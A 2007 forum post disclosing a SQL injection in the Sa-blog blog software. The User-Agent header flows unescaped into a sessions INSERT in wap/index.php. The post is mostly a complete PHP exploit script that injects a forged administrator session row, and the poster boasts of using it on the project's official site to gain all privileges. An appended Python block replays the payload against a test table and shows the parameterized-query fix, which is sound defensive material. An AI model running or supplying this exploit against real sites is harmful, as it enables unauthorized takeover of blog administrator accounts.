
Sa-blog 0day

yxwxqflbyg
Posted on 2007-9-18 06:54:12
Quotation
First: the exploit is for PHP5 because _SERVER variables are not subject to the ' quote restriction, even when escaping is turned on. The vulnerability is in User-Agent.

Second: inserting multiple rows with insert into. What the post constructs is:

insert INTO {$db_prefix}sessions (hash,uid,groupid,ipaddress,agent,lastactivity) VALUES ('$hash', '".$user['userid']."', '".$user['groupid']."', '$iprand','',1),('9c5b71e5',1,1,'211.43.206.202','9989581653', '$timestamp');

MySQL supports data insertion like insert into [admin] (name,pass) values ('qq','bb'),('aa','cc'). ACCESS does not.



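sablog is a blog program written by a security researcher in China, but a small flaw in the code makes it possible to obtain administrator privileges :)

The problem is around line 652 of wap/index.php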

------------
$hash = getuserhash($user['userid'], $user['username'], $user['password'], $user['logincount']+1);
$DB->query("delete FROM {$db_prefix}sessions where uid='".$user['userid']."' OR lastactivity+3600<'$timestamp' OR hash='$hash'");
$DB->query("insert INTO {$db_prefix}sessions (hash,uid,groupid,ipaddress,agent,lastactivity) VALUES ('$hash', '".$user['userid']."', '".$user['groupid']."', '$onlineip', '".$_SERVER['HTTP_USER_AGENT']."', '$timestamp')");
-------------

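Note that the _SERVER variable goes straight into the database, so there is an insert-type injection. We tested the official site with this vulnerability and smoothly obtained all privileges, hehe.

This spot requires php5; probably a momentary oversight by the author. Here is the exp we used at the time: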
------------
<?php
//from loveshell.net
$url = $argv[1].'/wap/index.php';
$username = $argv[2];
$password = $argv[3];

echo" +----------------------------------------------------------------+\r\n";
echo" Uage: php.exe blogurl username password\r\n";
echo" example php.exe http://www.loveshell.net/blog test test\r\n";
echo" +----------------------------------------------------------------+\r\n";

if(!$username||!$password) die;

echo" root@localhost:Post our content\r\n";

$str = 'username='.$username.'&password='.$password.'&action=login&do=login&';

$msg = myrequest($str,$url);
echo $msg;

if(strpos($msg,'登陆成功')!==false) echo" root@localhost:All Done!!! \r\n";
else echo" root@localhost:Login error!!! \r\n";
echo" +----------------------------------------------------------------+\r\n";
echo" Enjoy yourself.\r\n";
echo" +----------------------------------------------------------------+\r\n";

function myrequest($msg,$url,$type=2,$cookie=''){
	//change type for post/get
	global $sql;
	$urls = initurl($url);
	$iprand = rand(1,255).'.'.rand(1,255).'.'.rand(1,255).'.'.rand(1,255);
	$fp = @fsockopen($urls['host'], $urls['port'], $errno, $errstr, 3);
	if($fp) {
		if($type==1){
			fputs($fp, "GET $urls[path]?$urls[query] HTTP/1.1\r\n");
			fputs($fp, "Host: $urls[host]\r\n");
			fputs($fp, "Accept: */*\r\n");
			fputs($fp, "Referer: $urls\r\n");
			fputs($fp, "User-Agent: Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)\r\n");
			fputs($fp, "CLIENT_IP: $iprand\r\n");
			fputs($fp, "X_FORWARDED-FOR: $iprand\r\n");
			fputs($fp, "Pragma: no-cache\r\n");
			fputs($fp, "Cache-Control: no-cache\r\n");
			fputs($fp, "Connection: Keep-Alive\r\n");
			fputs($fp, "Cookie: $cookie\r\n\r\n");
		}else{
			fputs($fp, "POST $urls[path]?$urls[query] HTTP/1.1\r\n");
			fputs($fp, "Accept: application/x-shockwave-flash, image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*\r\n");
			fputs($fp, "Referer: $urls[url]\r\n");
			fputs($fp, "Accept-Language: zh-cn\r\n");
			fputs($fp, "Content-Type: application/x-www-form-urlencoded\r\n");
			// fputs($fp, "User-Agent: ',1),((select concat(0x2f,groupid,0x2f,logincount) from angel_users limit 1),1,1,'211.43.206.208','123\r\n");
			fputs($fp, "User-Agent: ',1),('9c5b71e5',1,1,'211.43.206.202','9989581653\r\n");
			fputs($fp, "CLIENT_IP: $iprand\r\n");
			fputs($fp, "X_FORWARDED-FOR: $iprand\r\n");
			fputs($fp, "Host: $urls[host]\r\n");
			fputs($fp, "Content-Length: ".strlen($msg)."\r\n");
			fputs($fp, "Connection: Keep-Alive\r\n");
			fputs($fp, "Cache-Control: no-cache\r\n");
			fputs($fp, "Cookie: $cookie\r\n\r\n");
			fputs($fp, $msg."\r\n");
		}
	}

	while($fp&&!feof($fp)) {
		$resp .= fread($fp,1024);
	}
	return $resp;
}

function initurl($url) {

	$newurl = '';
	$blanks = array('url'=>'');
	$urls = $blanks;
	if(strlen($url)<10) return $blanks;
	$urls = @parse_url($url);
	if(empty($urls) || !is_array($urls)) return $blanks;
	if(empty($urls['scheme'])) return $blanks;
	if($urls['scheme'] == 'file') return $blanks;
	$newurl .= $urls['scheme'].'://';
	$newurl .= empty($urls['user'])?'':$urls['user'];
	$newurl .= empty($urls['pass'])?'':':'.$urls['pass'];
	$newurl .= empty($urls['host'])?'':((!empty($urls['user']) || !empty($urls['pass']))?'@':'').$urls['host'];
	$newurl .= empty($urls['port'])?'':':'.$urls['port'];
	$newurl .= empty($urls['path'])?'':$urls['path'];
	$newurl .= empty($urls['query'])?'':'?'.$urls['query'];
	$newurl .= empty($urls['fragment'])?'':'#'.$urls['fragment'];
	$urls['port'] = empty($urls['port'])?'80':$urls['port'];
	$urls['url'] = $newurl;
	return $urls;
}
?>
------------

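This one was fairly interesting; there are at least 3 knowledge points in it that have not come up before. Also, sablog's encrypted authentication scheme is very weak, and together with this injection it is possible to get into the admin backend, so the author needs to fix it. Users who are worried about problems should disable wap. I won't analyze what the exp means; if you analyze it carefully there are some very interesting things in it.....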
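
Added example, not part of the original post and not Sa-blog code: the sessions insert built by string concatenation, as at wap/index.php, next to the same insert with bound parameters, run against the User-Agent value quoted in the post. Assumptions: an in-memory sqlite3 table stands in for the MySQL `sessions` table, and the function names, login hash, IP and timestamp are constructed for illustration.

```python
import sqlite3

# User-Agent values: a benign one, and the one quoted in the post's exp.
BENIGN_UA = "Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)"
POSTED_UA = "',1),('9c5b71e5',1,1,'211.43.206.202','9989581653"

COLS = "hash,uid,groupid,ipaddress,agent,lastactivity"

def new_db():
    # Assumption: in-memory sqlite3 stands in for the MySQL sessions table.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE sessions (hash TEXT, uid INTEGER, groupid INTEGER,"
               " ipaddress TEXT, agent TEXT, lastactivity INTEGER)")
    return db

def insert_concatenated(db, h, uid, gid, ip, agent, ts):
    # Same shape as the query at wap/index.php: the header is spliced into SQL text.
    db.execute(f"INSERT INTO sessions ({COLS}) VALUES "
               f"('{h}', '{uid}', '{gid}', '{ip}', '{agent}', '{ts}')")

def insert_bound(db, h, uid, gid, ip, agent, ts):
    # Hardened form: placeholders keep every value as data, whatever it contains.
    db.execute(f"INSERT INTO sessions ({COLS}) VALUES (?, ?, ?, ?, ?, ?)",
               (h, uid, gid, ip, agent, ts))

def session_rows(insert_fn, agent):
    # Constructed login: hash, uid, groupid, IP and timestamp are sample values.
    db = new_db()
    insert_fn(db, "aaaa1111", 2, 3, "192.0.2.10", agent, 1190069652)
    return db.execute(
        "SELECT hash, uid, groupid, agent FROM sessions ORDER BY rowid").fetchall()

if __name__ == "__main__":
    for name, fn in (("concatenated", insert_concatenated), ("bound", insert_bound)):
        for ua in (BENIGN_UA, POSTED_UA):
            print(name, session_rows(fn, ua))
```

With concatenation the single login produces two session rows, the second one entirely chosen by the client; with bound parameters it produces one row whose `agent` column holds the header text verbatim. In PHP the same binding is available through prepared statements in mysqli or PDO.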